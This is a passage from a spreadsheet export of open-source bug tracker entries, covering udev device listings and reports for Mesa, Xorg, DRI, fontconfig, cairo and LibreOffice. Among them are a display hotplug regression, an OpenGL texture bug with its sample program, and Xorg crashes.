E: ID_USB_INTERFACE_NUM=00
E: ID_USB_DRIVER=usbhid
E: ID_PATH=pci-0000:00:1d.0-usb-0:1:1.0
E: MAJOR=13
E: MINOR=33
E: DEVLINKS=/dev/char/13:33 
/dev/input/by-id/usb-Logitech_USB_Optical_Mouse-mouse 
/dev/input/by-path/pci-0000:00:1d.0-usb-0:1:1.0-mouse
P: /devices/pci0000:00/0000:00:1d.7/usb1/1-2/1-2:1.0/input/input8/event8
N: input/event8
S: char/13:72
S: input/by-id/usb-Microsoft_Microsoft_LifeCam_VX-5000-event-if00
S: input/by-path/pci-0000:00:1d.7-usb-0:2:1.0-event
E: UDEV_LOG=3
E: 
DEVPATH=/devices/pci0000:00/0000:00:1d.7/usb1/1-2/1-2:1.0/input/input8/event8
E: SUBSYSTEM=input
E: DEVNAME=input/event8
E: ID_INPUT=1
E: ID_INPUT_KEY=1
E: ID_VENDOR=Microsoft
E: ID_VENDOR_ENC=Microsoft
E: ID_VENDOR_ID=045e
E: ID_MODEL=Microsoft_LifeCam_VX-5000
E: ID_MODEL_ENC=Microsoft\x20LifeCam\x20VX-5000
E: ID_MODEL_ID=0728
E: ID_REVISION=0100
E: ID_SERIAL=Microsoft_Microsoft_LifeCam_VX-5000
E: ID_TYPE=video
E: ID_BUS=usb
E: ID_USB_INTERFACES=:0e0100:0e0200:010100:010200:
E: ID_USB_INTERFACE_NUM=00
E: ID_USB_DRIVER=uvcvideo
E: ID_PATH=pci-0000:00:1d.7-usb-0:2:1.0
E: XKBMODEL=pc104
E: XKBLAYOUT=us
E: MAJOR=13
E: MINOR=72
E: DEVLINKS=/dev/char/13:72 
/dev/input/by-id/usb-Microsoft_Microsoft_LifeCam_VX-5000-event-if00 
/dev/input/by-path/pci-0000:00:1d.7-usb-0:2:1.0-event
P: /devices/platform/hdaps/input/input12/event12
N: input/event12
S: char/13:76
S: input/by-path/platform-hdaps-event
E: UDEV_LOG=3
E: DEVPATH=/devices/platform/hdaps/input/input12/event12
E: SUBSYSTEM=input
E: DEVNAME=input/event12
E: ID_INPUT=1
E: ID_PATH=platform-hdaps
E: DMI_VENDOR=LENOVO
E: MAJOR=13
E: MINOR=76
E: DEVLINKS=/dev/char/13:76 /dev/input/by-path/platform-hdaps-event
P: /devices/platform/hdaps/input/input12/js0
N: input/js0
S: char/13:0
E: UDEV_LOG=3
E: DEVPATH=/devices/platform/hdaps/input/input12/js0
E: SUBSYSTEM=input
E: DEVNAME=input/js0
E: ID_INPUT=1
E: ID_PATH=platform-hdaps
E: MAJOR=13
E: MINOR=0
E: DEVLINKS=/dev/char/13:0
P: /devices/platform/i8042/serio0/input/input0/event0
N: input/event0
S: char/13:64
S: input/by-path/platform-i8042-serio-0-event-kbd
E: UDEV_LOG=3
E: DEVPATH=/devices/platform/i8042/serio0/input/input0/event0
E: SUBSYSTEM=input
E: DEVNAME=input/event0
E: ID_INPUT=1
E: ID_INPUT_KEY=1
E: ID_INPUT_KEYBOARD=1
E: ID_SERIAL=noserial
E: ID_PATH=platform-i8042-serio-0
E: XKBMODEL=pc104
E: XKBLAYOUT=us
E: MAJOR=13
E: MINOR=64
E: DEVLINKS=/dev/char/13:64 /dev/input/by-path/platform-i8042-serio-0-event-kbd
E: DMI_VENDOR=LENOVO
P: /devices/platform/i8042/serio1/input/input7/event7
N: input/event7
S: char/13:71
S: input/by-path/platform-i8042-serio-1-event-mouse
E: UDEV_LOG=3
E: DEVPATH=/devices/platform/i8042/serio1/input/input7/event7
E: SUBSYSTEM=input
E: DEVNAME=input/event7
E: ID_INPUT=1
E: ID_INPUT_TOUCHPAD=1
E: ID_SERIAL=noserial
E: ID_PATH=platform-i8042-serio-1
E: DMI_VENDOR=LENOVO
E: MA</t>
  </si>
  <si>
    <t>segre</t>
  </si>
  <si>
    <t>FONTCONFIG-57286</t>
  </si>
  <si>
    <t>Remove UnBatang and Baekmuk Batang from monospace in 65-nonlatin.conf</t>
  </si>
  <si>
    <t>just picked it up from Ubuntu package.</t>
  </si>
  <si>
    <t>DRI-70301</t>
  </si>
  <si>
    <t>[IT6506 Display Receiver] DP hotplug fails (display and audio) with i915/kernel 3.11.1</t>
  </si>
  <si>
    <t>Created attachment 87310
environment info kernel log intel reg bios info Xorg info
1. The DP display function(for IT6506 receiver and IT6505 transmitter) is working with i915/kernel 3.9.5 but failed with i915/kernel 3.1x.
2. It seems having to do with intel_dp.c (it works if I replace intel_dp.c/kernel 3.1x with intel_dp.c/kernel 3.9.5)</t>
  </si>
  <si>
    <t>ken.lin</t>
  </si>
  <si>
    <t>LIBREOFFICE-65484</t>
  </si>
  <si>
    <t>Sidebar's Gallery folders are in English</t>
  </si>
  <si>
    <t>Although I remember translating these names of new included icons in Gallery the sidebar list of galleries lists many English strings as folder/theme names. Something went wrong?</t>
  </si>
  <si>
    <t>XORG-6628</t>
  </si>
  <si>
    <t>Fix broken Xephyr build in server-1-1-branch</t>
  </si>
  <si>
    <t>By moving the link order so libexa is linked before KDRIVE_LIBS the
--enable-kdrive build is fixed.
This is already committed to HEAD in rev 1.8 of hw/kdrive/ephyr/Makefile.am --
see
http://webcvs.freedesktop.org/xorg/xserver/xorg/hw/kdrive/ephyr/Makefile.am?r1=1.7&amp;r2=1.8</t>
  </si>
  <si>
    <t>FONTCONFIG-12734</t>
  </si>
  <si>
    <t>inconsistency between 32/64-bit chache files with the same filename</t>
  </si>
  <si>
    <t>Both x86_64-linux and i686-linux (or x86_64-linux in 32-bit compatibility mode) use th same name for chache files: *-x86.cache-2 the cache files themselves are however different as they contain 32- resp. 64-bit pointers.
Running a 64-bit binary (using the 64-bit version of the library) will convert existing 32-bit cache files into 64-bit ones and/or create 64-bit files. (E.g. running fc-list as root converts all files /usr/var/cache/fontconfig/*-x86.cache-2.)
Subsequently running a 32-bit binary (using the 32-bit version of the library) may then lead to a segmentation fault.
The simplest way out of this dilemma might be to use two different suffixes e.g. x86 and x86_64 for 32- and 64-bit respectively.
The very same problem most probably occurs for all bi-arch (linux) systems.</t>
  </si>
  <si>
    <t>MESA-4327</t>
  </si>
  <si>
    <t>texture mapping bug on unichrome</t>
  </si>
  <si>
    <t>I'm seeing a really weird texture mapping bug on unichrome.  My app displays
really large images by specifying a reasonable sized texture (a tile size
256x256 or 512x512) and calling glTexSubImage2D() to update that texture with a
portion of the larger image.  The app then draws a textured quad for that
portion of the screen.  This is repeated for all the tiles that make up the image.
What I'm seeing appears to be a couple scanlines from one tiles swapped with a
couple scanlines from another tile.  In addition there seems to be a small
triangle of the swapped image in the lower left of each tile.
I last updated my cvs trees for X drm and Mesa August 30th 2005.
I'm building for linux-dri-x86.
I don't see this issue with swrast nvidia or ati drivers.
The following is a small sample that reproduces the error:
#include 
#include 
#include 
#include 
#include 
Display *dpy
Window win
GLboolean doubleBuffer = GL_TRUE
static int snglBuf[] = {GLX_RGBA GLX_DEPTH_SIZE 16 None}
static int dblBuf[] = {GLX_RGBA GLX_DEPTH_SIZE 16 GLX_DOUBLEBUFFER None}
int tiledim = 0
int tilesize = 0
unsigned char *image = NULL
int numtiles = 3
GLint texid = 0
static GLfloat verts[4][2] = {
                                { 0.0f 0.0f }
                                { 1.0f 0.0f }
                                { 1.0f 1.0f }
                                { 0.0f 1.0f }
                              }
static GLfloat texcoords[4][2] = {
                                { 0.0f 0.0f }
                                { 1.0f 0.0f }
                                { 1.0f 1.0f }
                                { 0.0f 1.0f }
                              }
void init(void)
{
    unsigned char *dst = NULL
    int i = 0
    // get tile size
    glGetIntegerv(GL_MAX_TEXTURE_SIZE 
    tilesize = tiledim * tiledim * 4
    // create image buffer
    image = (unsigned char *) malloc(numtiles * tilesize)
    dst = image
    memset(image 0 numtiles * tilesize)
    // fill in red tile
    for(i = 0 i &lt; tiledim * tiledim i++)
    {
        *dst++ = 255 // r
        *dst++ = 0   // g
        *dst++ = 0   // b
        *dst++ = 255 // a
    }
    // fill in green tile
    for(i = 0 i &lt; tiledim * tiledim i++)
    {
        *dst++ = 0   // r
        *dst++ = 255 // g
        *dst++ = 0   // b
        *dst++ = 255 // a
    }
    // fill in blue tile
    for(i = 0 i &lt; tiledim * tiledim i++)
    {
        *dst++ = 0   // r
        *dst++ = 0   // g
        *dst++ = 255 // b
        *dst++ = 255 // a
    }
    // create gl texture
    glEnable(GL_TEXTURE_2D)
    glGenTextures(1 
    glBindTexture(GL_TEXTURE_2D texid)
    glTexParameteri(GL_TEXTURE_2D GL_TEXTURE_MAG_FILTER GL_NEAREST)
    glTexParameteri(GL_TEXTURE_2D GL_TEXTURE_MIN_FILTER GL_NEAREST)
    glTexImage2D(GL_TEXTURE_2D 0 GL_RGBA tiledim tiledim 0 GL_RGBA
GL_UNSIGNED_BYTE NULL)
    // setup verts
    glEnableClientState(GL_VERTEX_ARRAY)
    glEnableClientState(GL_TEXTURE_COORD_ARRAY)
    glVertexPointer(2 GL_FLOAT 0 verts)
    glTexCoordPointer(2 GL_FLOAT 0 texcoords)
    // setup frustum
    glMatrixMode(GL_PROJECTION)
    glLoadIdentity()
    glFrustum(-1.5 1.5 -1.5 1.5 1 10000)
    glMatrixMode(GL_MODELVIEW)
    glLoadIdentity()
}
void draw(void)
{
    unsigned char *subimage = NULL
    int i = 0
    glLoadIdentity()
    glTranslatef(-2.5 0.0 -1.0)
    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
    for(i = 0 i &lt; numtiles i++)
    {
        subimage = image + (i * tilesize)
        glTranslatef(1.0 0.0 0.0)
        glTexSubImage2D(GL_TEXTURE_2D 0 0 0 tiledim tiledim GL_RGBA
GL_UNSIGNED_BYTE subimage)
        glDrawArrays(GL_TRIANGLE_FAN 0 4)
    }
    glXSwapBuffers(dpy win)
}
int main(int argc char *argv[])
{
    XVisualInfo    *vi
    Colormap        cmap
    XSetWindowAttributes swa
    GLXContext      cx
    int         dummy
    int asdf = 1 
    XEvent event
    KeySym keysym
    XComposeStatus compose
    /*** (1) open a connection to the X server ***/
    dpy = XOpenDisplay(NULL)
    if (dpy == NULL)
    {
        printf(could not open display\n)
        return 1
    }
    /*** (2) make sure OpenGL's GLX extension supported ***/
    if(!glXQueryExtension(dpy &amp;dummy &amp;dummy))
    {
        printf(X server has no OpenGL GLX extension\n)
        return 1
    }
    /*** (3) find an appropriate visual ***/
    /* find an OpenGL-capable RGB visual with depth buffer */
    vi = glXChooseVisual(dpy DefaultScreen(dpy) dblBuf)
    if (vi == NULL)
    {
        printf(couldn't get dblBuf\n)
        vi = glXChooseVisual(dpy DefaultScreen(dpy) snglBuf)
        if (vi == NULL)
        {
            printf(no RGB visual with depth buffer\n)
            return 1
        }
        doubleBuffer = GL_FALSE
    }
    //printf(got visual id 0x%x\n vi-&gt;visualid)
    if(vi-&gt;class != TrueColor)
    {
        printf(TrueColor visual required for this program\n)
    }
    /*** (4) create an OpenGL rendering context  ***/
    /* create an OpenGL rendering context */
    cx = glXCreateContext(dpy vi None GL_TRUE)
    if (cx == NULL)
    {
        printf(could not create rendering context\n)
        return 1
    }
    /*** (5) create an X window with the selected visual ***/
    /* create an X colormap since probably not using default visual */
    cmap = XCreateColormap(dpy RootWindow(dpy vi-&gt;screen) vi-&gt;visual AllocNone)
    swa.colormap = cmap
    swa.border_pixel = 0
    swa.override_redirect = False
    swa.event_mask = ExposureMask | ButtonPressMask | StructureNotifyMask
    win = XCreateWindow(dpy RootWindow(dpy vi-&gt;screen) 0 0 640 480 0
vi-&gt;depth InputOutput vi-&gt;visual CWOverrideRedirect | CWBorderPixel |
CWColormap | CWEventMask 
    /*** (6) bind the rendering context to the window ***/
    glXMakeCurrent(dpy win cx)
    /*** (7) request the X window to be displayed on the screen ***/
    XSelectInput(dpy win ExposureMask | KeyPressMask | KeyReleaseMask |
ButtonPressMask | StructureNotifyMask)
    Cursor no_ptr
    Pixmap bm_no
    XColor black xdummy
    Colormap colormap
    static char no_data[] = { 00000000 }
    /* make sure the window is in the upper-left */
    XMoveWindow(dpy win 0 0)
    /*
     * Some code to hide the cursor.  This just creates an empty 8x8 pixmap
     * and defines the cursor to be that pixmap.
     */
    colormap = DefaultColormap(dpy DefaultScreen(dpy))
    XAllocNamedColor(dpy colormap black 
    bm_no = XCreateBitmapFromData(dpy win no_data 8 8)
    no_ptr = XCreatePixmapCursor(dpy bm_no bm_no 
    XDefineCursor(dpy win no_ptr)
    XFreeCursor(dpy no_ptr)
    XMapWindow(dpy win)
    XFlush(dpy)
    init()
    asdf = 1 
    while(asdf)
    {
      if(XPending(dpy))
      {
            if(XCheckWindowEvent(dpy win KeyPressMask | KeyReleaseMask |
ExposureMask | ButtonPressMask | StructureNotifyMask &amp;event)) /* loop to
compress events */
            {
                switch (event.type)
                {
                    case KeyPress:
                        XLookupString((XKeyEvent *)&amp;event NULL 0x00 &amp;keysym
                        if(keysym == XK_Escape)
                        {
                           asdf = 0 
                        }
                        break
                }
            }
        }
        draw()
    }
    return 0
}</t>
  </si>
  <si>
    <t>flynnt</t>
  </si>
  <si>
    <t>XORG-5839</t>
  </si>
  <si>
    <t>I broke XStoreColors on Xlib/XCB</t>
  </si>
  <si>
    <t>When converting Xlib/XCB to use only XCB's public API I assumed that Xlib
protocol stubs don't ever call the Data family of macros more than once per
GetReq. I thought doing so would be a bug because Data can call _XFlush and I
thought that might lead to a race in multi-threaded settings.
It looks like it doesn't lead to a race though and XStoreColors (for one) does
call Data many times. This causes an assertion failure in current Xlib/XCB if
XStoreColors is called with more colors than will fit in Xlib's 16kB output
queue. (!)
I need to properly handle multiple calls to Data in Xlib/XCB.</t>
  </si>
  <si>
    <t>MESA-21926</t>
  </si>
  <si>
    <t>[G45 UXA] openarena freezes X after 1-20min</t>
  </si>
  <si>
    <t>Bug description:
openarena freezes X after several minutes of singleplayer gameplay. It rarely happens right at the start but most often after half a map or one and a half maps. The screen becomes completely unresponsive and the sound loops in a subsecond loop but background processes keep working and openarena doesn't use excessive cpu. It happens in full screen and windowed mode. During play graphics are flawless.
Switching to other tty's doesn't show any change on the screen but it is possible to ssh into the box and use top or kill processes. It just doesn't show any change on screen.
When starting openarena from a terminal window it will only show bot chat but no error messages get displayed during crash.
sudo reboot initiates reboot with a system beep (but no screen change) and ssh gets disconnected after some hdd activity but shutdown doesn't finish.
Alt+Print+[REISUB] works to reboot the machine. After Alt+Print+R the game texture colors become partly inverted.
This freeze has occured on this machine on several seperate installations since (myth/K/u)buntu 8.10 x86_64 and hasn't changed with any update to
(-&gt; ubuntu 9.04
 -&gt; ubuntu 9.04 + x-swat ppa
 -&gt; ubuntu 9.04 + x-swat ppa + intel 2:2.7.99.1-1 from debian experimental reps)
(-&gt; mythbuntu 9.04
 -&gt; mythbuntu 9.10 alpha1
 -&gt; mythbuntu 9.10 alpha1 + xorg-edgers ppa)
(-&gt; Kubuntu 9.04).
It also shows on Sabayon 4.1 .
The attached logfiles are from the installation mythbuntu 9.10 alpha1 + xorg-edgers ppa.
System environment:
-- chipset: G45
-- system architecture: 64-bit
-- xf86-video-intel: 2:2.7.99.1+git20090520.ad212882-0ubuntu0sarvatt
-- xserver: 2:1.6.1.901-2ubuntu1
-- mesa: 7.6.0~git20090524.r1.2d30dafa-0ubuntu0sarvatt
-- libdrm: 2.4.11+git20090519.f355ad89-0ubuntu0sarvatt
-- kernel: 2.6.30-5-generic #6-Ubuntu SMP Mon May 11 20:46:57 UTC 2009 x86_64 GNU/Linux
-- Linux distribution: mythbuntu 9.10 / XFCE
-- Machine or mobo model: Foxconn G45M-S (X4500 HD)
-- CPU: Intel Core 2 Duo E7400
-- RAM: ADATA 2x2GB
-- Display connector: VGA
-- Monitor: HP LP2475w
Reproducing steps:
$ openarena
Additional info:
I have already submitted this bug with older logfiles here:
https://bugs.launchpad.net/ubuntu/+source/openarena/+bug/378554</t>
  </si>
  <si>
    <t>olaf.encke</t>
  </si>
  <si>
    <t>DRI-72314</t>
  </si>
  <si>
    <t>[hsw] Enabling ext. Monitor takes up to 24s</t>
  </si>
  <si>
    <t>Created attachment 90237
dmesg 3.13.0-rc1 replug monitor 5 times
+++ This bug was initially created as a clone of Bug #71267 +++
- same HW as in bug #71267
- kernel v3.13.0-rc1 + udelay(500) (see bug #71267 comment #29 and comment #32)
(As stated in the initial bug udelay() has to be raised to 500. Todd wrote that 300 might be okay. So 500 is far above this. Hopefully the 500 doesn't cause this bug as a side-effect.)
When plugging in the monitor at one DP of the docking station it takes up to 24s (shortest was 3s) until it gets activated (the console cloned to it).
In this attachment I've replugged the monitor 5 times log timestamps are:
  1. 30-33 ... 3s
  2. 74-85 ... 11s
  3. 184-203 ... 19s
  4. 238-262 ... 24s
  5. 303-310 ... 7s
As of this I wouldn't call it a bug - the monitor gets activated finally. Therefor I've set the priority to lowest.</t>
  </si>
  <si>
    <t>DRI-21428</t>
  </si>
  <si>
    <t>[KMS 945GME] extended desktop broken</t>
  </si>
  <si>
    <t>Created attachment 25179
xorg.0.log
System Environment:
--------------------------
Host:           x-aspire1
Arch:           i386
Platform:       945GME (aspire one)
OSD:            Fedora release 9 (Sulphur)
Libdrm:         (master)412d370b9ae4b2882691863a1c5e13a507574e92
Mesa:           (mesa_7_4_branch)e8807a14a61a0b9389aa2f2a113da24ab22a364d
Xserver:        (server-1.6-branch)11db545a86c8933c638a0bc1fcd4f2c65279f617
Xf86_video_intel:               (2.7)296a986e5258e2fd13ec494071b7063bd639cd68
Kernel:       (qa-branch)ba1d2a9be507cda299c15740ff7e2bb3705a4792
connector: lvds and vga 
Bug detailed description:
--------------------------
startx and run xrandr --output LVDS1 --above VGA1 to let vga monitor play as a extended monitor then we drag the terminal window to the extended one it should only display on the extended one(VGA) but now it also can be seen on the screen of LVDS. and when dragging the terminal back to the position between two monitor we can not see the part of terminal in the lvds there is only a cursor there. 
Reproduce Steps:
-------------------------
1.xinit&amp;
2.xrandr --output LVDS1 --above VGA1
3.drag terminal window to the extended monitor</t>
  </si>
  <si>
    <t>WOCKY-30430</t>
  </si>
  <si>
    <t>Make wocky_implement_finish_* macros safer</t>
  </si>
  <si>
    <t>wocky_implement_finish_* macros have several issues that may lead to unsafe operations. As it is related I also notice that some cancellable are not handled properly.
1. _is_valid() is called after _propagate_error()
This is done this way because g_simple_async_report_in_idle() lakes a parameter for the source tag. This has been discussed with the GLib people and the best solution is not to use it. A exception to _is_valid() might be added but that would only come in the next cycle. Patch 001 removes the use of g_simple_async_report_in_idle() allowing _is_valid() to be called first as it's supposed. The advantage of such solution is that we don't force anybody into bumping to bleeding edge GLib.
2. Cancellable are not always reffed during the async calls
When cancelling a call it is correct to do g_cancellable_cancel(c) g_object_unref (c). Some of the async functions are not safe for that since they don't acquire a reference on the cancellable. Patch 002 fixes all the calls that where not doing proper ref/unref of cancellables.
3. The macro is missing scope
The macros are missing a scope (do { ... } while (0)) which is also used to force usage of  at the end of macro call. Patch 003 does that along with calling _is_valid() first and allowing g_object_unref to be a valid copy_func. g_object_unref does not support NULL as parameter.
[001] http://git.collabora.co.uk/?p=user/nicolas/wocky.gita=commith=ca404f4e6e67b7f9aad0f1824cc1de1480e213de
[002] http://git.collabora.co.uk/?p=user/nicolas/wocky.gita=commith=df876bc74322b7cd61d0691a20e281891a822318
[003] http://git.collabora.co.uk/?p=user/nicolas/wocky.gita=commith=df876bc74322b7cd61d0691a20e281891a822318</t>
  </si>
  <si>
    <t>DRI-27452</t>
  </si>
  <si>
    <t>Evergreen KMS DRM sets bizarre 1922x1200 resolution</t>
  </si>
  <si>
    <t>Created attachment 34665
dmesg from 2.6.32.9 stable with drm-radeon-testing merged
BACKGROUND
I ordered a Radeon HD 5750 at the beginning of February when the first Evergreen support was announced for xf86-video-ati.  I first tried it out on Feb. 15.  See this post:
http://lists.x.org/archives/xorg-driver-ati/2010-February/013857.html
I was using the drm-radeon-testing branch of kernel 2.6.32 as well as 2.6.33-rc8 with drm-radeon-testing merged and experienced some black screen issues.  See:
http://lists.x.org/archives/xorg-driver-ati/2010-February/013859.html
I was able to verify that my video card cables power supply etc. were not at fault by multibooting with Windows Vista and installing the ATI Catalyst drivers.  The system worked fine -- spent 6 hours giving it a thorough workout with a 3D FPS game!
A week later I discovered that my usage of a KVM device (keyboard/video/mouse not kernel virtualization) was causing the black screen issue.  Using a DVI cable direct to the monitor resolved the problems.  (This was disappointing since my HD 4850 works fine with the same KVM device even using a DVI-to-VGA cable before connecting to the KVM.)  See:
http://lists.x.org/archives/xorg-driver-ati/2010-February/013942.html
  CURRENT PROBLEM
A few days later I upgraded my monitor.  This monitor only has VGA/Dsub and HDMI inputs but provided no HDMI cable.  Instead a DVI-to-HDMI converter cable was packaged with the monitor so I used that.  I found that booting into KMS with no X server gave me a radeondrmfb virtual terminal with a pink vertical line 2 pixels wide from top to bottom on the left side of the screen.  See:
http://lists.x.org/archives/xorg-driver-ati/2010-February/014044.html
Disabling KMS worked correctly but switching from X to virtual terminals was not supported without KMS.  Since KMS is the future I felt this cure to be worse than the disease.  See:
http://lists.x.org/archives/xorg-driver-ati/2010-February/014061.html
Replacing the HD 5750 with the HD 4850 but still using the DVI-to-HDMI cable worked:
http://lists.x.org/archives/xorg-driver-ati/2010-February/014062.html
I thought it may be an artifact of the DVI-to-HDMI converter cable so I ordered a HDMI cable.  That arrived on March 1 but made no difference regarding the vertical pink line:
http://lists.x.org/archives/xorg-driver-ati/2010-March/014083.html
The monitor itself actually gets set to a strange 1922x1200 mode when it is only physically cable of 1920x1200 resolution.  I would have thought it would simply refuse to display an image but instead it actually gives me a near-perfect display... just with the thin vertical bar on the left edge.  As mentioned in the above email message a lurker on the xorg-driver-ati list emailed me (privately for some reason) that he had an identical vertical bar on his HD 5870 card.  (Mine is HD 5750.)
At that time (beginning of March) I didn't know where else I could report Evergreen issues than the xorg-driver-ati list.  It looked like Alex Deucher was the one who had written the Evergreen support code the DRM/DRI mailing list looked pretty dead and no one recommended that I should file a bug on the fdo bugzilla.  I didn't think there were product/component settings appropriate for Evergreen support yet.
Since then I have been tracking changes (via git) to the Linux kernel and xf86-video-ati looking for anything related to my HD 4850 and HD 5750 cards.  Recently there have been some commits in the kernel that touch (slightly) on Evergreen support so I built a 2.6.34-rc3 kernel including the drm-linus changes up to commit 42be79e on Apr 1 2010.  I tested the HD 5750 with that kernel yesterday but I found that I still get the pink vertical line.
I have partial dmesg output from stable kernel 2.6.32.9 with drm-radeon-testing merged (save on Feb. 23) and the corresponding dmesg output from yesterday is identical.  After yesterday's testing I decided to look more carefully at the fdo bugzilla to see whether an appropriate combination of product and component for Evergreen issues could be found I'm filing this bug to see how much trouble I can get myself into!  )
Presently I have replaced the HD 5750 with the HD 4850:  I don't like running my monitor with its onscreen display reporting 1922 horizontal resolution.  It's a brand new monitor and works beautifully.  I will leave the HD 5750 installed permanently once this mode setting issue is addressed.</t>
  </si>
  <si>
    <t>TELEPATHY-32611</t>
  </si>
  <si>
    <t>Implement gabble Room interface updates</t>
  </si>
  <si>
    <t>Room has been a DRAFT for a while. I implemented it. Review plz!</t>
  </si>
  <si>
    <t>BURN-100524</t>
  </si>
  <si>
    <t>Application getting crashes on connection.</t>
  </si>
  <si>
    <t>Steps:
1. Install Blutest.apk on Andriod version kitkat (4.0.4)
2. Tap on application
3. Connection screen is displayed
4. Tap on Scan button for near by probes.
5. Select probe from list.
6. Tap on Proceed button.
Expected Result:
Application must be connected with probe after proceed.
Actual Result:
BluTest application getting crash after tap on Proceed button.
Note:
BluTest.exe Stopped Working error display</t>
  </si>
  <si>
    <t>CAIRO-4094</t>
  </si>
  <si>
    <t>_cairo_pattern_set_error tries to write to read-only memory</t>
  </si>
  <si>
    <t>_cairo_pattern_set_error is a little function that sets the error value in a
pattern.  It just does this:
    pattern-&gt;status = status
    _cairo_error (status)
It is called at the top of a bunch of public API functions as a sort of sanity
check:
void cairo_pattern_blah (...) {
    if (pattern-&gt;status) {
        _cairo_pattern_set_error (pattern pattern-&gt;status)
        return
    }
    ...
However the nil pattern that you get if you're out of memory is defined as a
const structure and is therefore in read-only memory:
    const cairo_solid_pattern_t cairo_solid_pattern_nil = { ... }
The following code will therefore segfault if you are out of memory:
    pattern = cairo_pattern_create_for_surface (image)
    cairo_pattern_set_extend (pattern CAIRO_EXTEND_REPEAT)
To test this have cairo_pattern_create_for_surface hacked to always return the
nil surface.</t>
  </si>
  <si>
    <t>XORG-56680</t>
  </si>
  <si>
    <t>[Bisected] xf86-video-ati git breaks X with no screens found</t>
  </si>
  <si>
    <t>Latest -ati git breaks X. Bisected:
39eac3104c2f08b4d78aab3f88fd104301eb4711 is the first bad commit
commit 39eac3104c2f08b4d78aab3f88fd104301eb4711
Author: Ilija Hadzic 
Date:   Mon Sep 24 17:41:32 2012 -0400
    radeon/radeon_platform_probe: fix Zaphod mode breakage
    Using radeon_platform_probe function breaks the Zaphod mode because
    it attempts to call xf86AddEntityToScreen multiple times but nobody
    calls xf86SetEntityShared prior to that. Consequently calls for all
    but first device instance fail.
    Prior to introduction of platform bus the logic was that the Probe
    function would make the entity sharable which would cause Xserver
    to later make it shared prior to adding it to screen. With the
    platform bus loading add to screen happens in the probe
    function so we have to make it shared there.
    Signed-off-by: Ilija Hadzic 
:040000 040000 42764e008e64efcf63a9324e859d73c292db20fd 36d1a97b0bc6add7eff8fab50757cf21eac1b1a2 M	src</t>
  </si>
  <si>
    <t>LIBREOFFICE-60791</t>
  </si>
  <si>
    <t>Impress remote: fix elapsed time tracking</t>
  </si>
  <si>
    <t>The elapsed time tracking in the sdremote is just broken. I attach a partial patch to improve it but even this is awful.
I think we should have a simple combo-box / list of pre-canned / selectable times: 5 mins 15 minutes etc. and (perhaps as an extra option) allow people to select a Custom time.
The setting should also be persisted.
The code is in android/sdremote/ variously - with some more code pointers in the patch (although the patch is mostly a throw-away thing).
Would love some input here !</t>
  </si>
  <si>
    <t>chasak.ota</t>
  </si>
  <si>
    <t>MESA-16029</t>
  </si>
  <si>
    <t>blocker for mesa7_0_branch Intel drivers</t>
  </si>
  <si>
    <t>Lists of bugs we would like to fix for stabilizing Intel drivers on mesa7_0_branch</t>
  </si>
  <si>
    <t>MESA-27962</t>
  </si>
  <si>
    <t>BufferSwapComplete delivered when not selected for (direct rendering)</t>
  </si>
  <si>
    <t>The X server implementation of GLX checks the drawables event mask before sending GLX_BufferSwapComplete events but when direct rendering we convert DRI2_BufferSwapComplete events into the GLX events and the DRI2 events are sent unconditionally. So application always receives events even when it hasn't asked for them.
This certainly violates the expectations of the extension spec and could confuse applications.
Probably DRI2EventToWire should silently consume the events without delivering them (this would mean saving the event mask client side.)</t>
  </si>
  <si>
    <t>XORG-90483</t>
  </si>
  <si>
    <t>/usr/bin/Xorg -configure catches SIGSEGV</t>
  </si>
  <si>
    <t>Created attachment 115839
Xorg (xorg_backtrace+0x52) [0xb76af552]
Attempting to generate an xorg.config file crashes though it manages to generate some of the configuration before doing so. Running Debian 8 32-bit on an old laptop with latest stable Xorg 1.16.4.
I also installed debug symbols but it appeared to make no difference in the backtrace quality.</t>
  </si>
  <si>
    <t>gaming4jc2</t>
  </si>
  <si>
    <t>LIBOIL-20058</t>
  </si>
  <si>
    <t>Mark CRIS as supporting unaligned accesses</t>
  </si>
  <si>
    <t>Created attachment 22810
Whitelist CRIS as it supports unaligned accesses.
The CRIS and CRISv32 architectures support unaligned accesses. The attached patch updates AS_UNALIGNED_ACCESS to take this into account.</t>
  </si>
  <si>
    <t>PACKAGEKIT-18642</t>
  </si>
  <si>
    <t>[gnome-packagekit] POT file not regenerated dead references in POTFILES.in</t>
  </si>
  <si>
    <t>Please see http://l10n.gnome.org/module/gnome-packagekit</t>
  </si>
  <si>
    <t>MESA-108319</t>
  </si>
  <si>
    <t>[GLK BXT BSW] Assertion in piglit.spec.arb_gpu_shader_fp64.execution.built-in-functions.vs-sign-sat-neg-abs</t>
  </si>
  <si>
    <t>Atom platforms began asserting with series ending in:
----------------------------------------------
b44c9292b7e5a24e6b06a197d4e72b43a8799d09
Author:     Ian Romanick 
intel/compiler: Don't handle fsign.sat
No shader-db or CI changes on any Intel platform.
----------------------------------------------
stdout:
/tmp/build_root/m64/lib/piglit/bin/shader_runner /tmp/build_root/m64/lib/piglit/tests/spec/arb_gpu_shader_fp64/execution/built-in-functions/vs-sign-sat-neg-abs.shader_test -auto -fbo
----------------------------------------------
stderr:
shader_runner: ../src/intel/compiler/brw_fs_generator.cpp:2477: int fs_generator::generate_code(const cfg_t* int): Assertion `validated' failed.
----------------------------------------------
Unfortunately atom systems are too slow to check patches pre-merge in CI. 
More specific bisection results should be available in a few hours.</t>
  </si>
  <si>
    <t>XORG-26668</t>
  </si>
  <si>
    <t>Dual head not working with Radeon HD 5800</t>
  </si>
  <si>
    <t>Created attachment 33452
Xorg log with UMS and minimal xorg.conf
Hello
I am trying a dual head setup with no success so far...
Hardware:
Radeon HD 5850 (1002:6899)
Primary monitor: DVI-D Samsung SyncMaster 1920x1080 connected to DVI-1 output
Secondary monitor: VGA Acer AL2216W 1680x1050 connected to DVI-0 output (with DVI-A/VGA adaptator)
Software:
Ubuntu Lucid
kernel 2.6.32 + drm from drm-radeon-testing (git commit 45fa67...)
xorg 1.7.5
radeon ddx 6.12.99 (git commit a3b730ec...)
The desired setup is to have the primary monitor right of the secondary one
That is primary at +1680 +0 and secondary at +0 +15
What I have tried:
* KMS with minimal Xorg.conf
Dual Head setup using xrandr or gnome-display-properties
* UMS with minimal Xorg.conf + 'Virtual 3600 1080' display option
Dual Head setup using xrandr or gnome-display-propertie
* KMS with dual head setup in Xorg.conf
What happen:
The secondary display (the VGA one connected to DVI-0) always stays off
There is also sometimes bug in with the cursor: it can't reach all part of the display it appears to hit some 'invisible wall' like if the right edge of the desktop was in the middle of the screen.</t>
  </si>
  <si>
    <t>UIM-6925</t>
  </si>
  <si>
